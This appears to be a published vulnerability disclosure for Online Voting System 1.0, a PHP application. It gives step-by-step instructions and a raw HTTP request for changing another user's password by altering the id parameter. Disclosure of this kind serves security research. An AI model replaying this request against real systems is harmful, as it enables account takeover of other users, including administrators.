Online Voting System version 1.0 suffers from an authorization bypass vulnerability that allows for the password change of other users.
b5602920743becf85d943b0687ceab51b1b1fe2b42685c27fffed369ebcea8e3# Exploit Title:Online Voting System | Authentication Bypass (Password Change
# Exploit Author: Richard Jones
# Date: 2021-01-29
# Vendor Homepage: https://www.sourcecodester.com/php/14690/online-voting-system-phpmysqli-full-source-code.html
# Software Link:https://www.sourcecodester.com/download-code?nid=14690&title=Online+Voting+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
## Steps to reproduce
# 1. Register an account (any user): https://TARGET/online_voting/registeracc.php
# 2. Login
# 3. Goto change password: https://TARGET/online_voting/changepass.php
# 4. Change the password and intercept the request with Burp Suite
# 5. Change the id paramater (id=7 to, id=1) of the url to another users account, Password will be updated
POST /online_voting/changepass.php?id=7 HTTP/1.1
Host: TARGET
Content-Length: 55
Connection: close
Referer: https://localhost/online_voting/changepass.php?id=7
Cookie: PHPSESSID=t19ph5v0sem2pi0gaap55j08ei
oldpass=a&newpass=a&conpass=a&changepass=Update+Profile
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed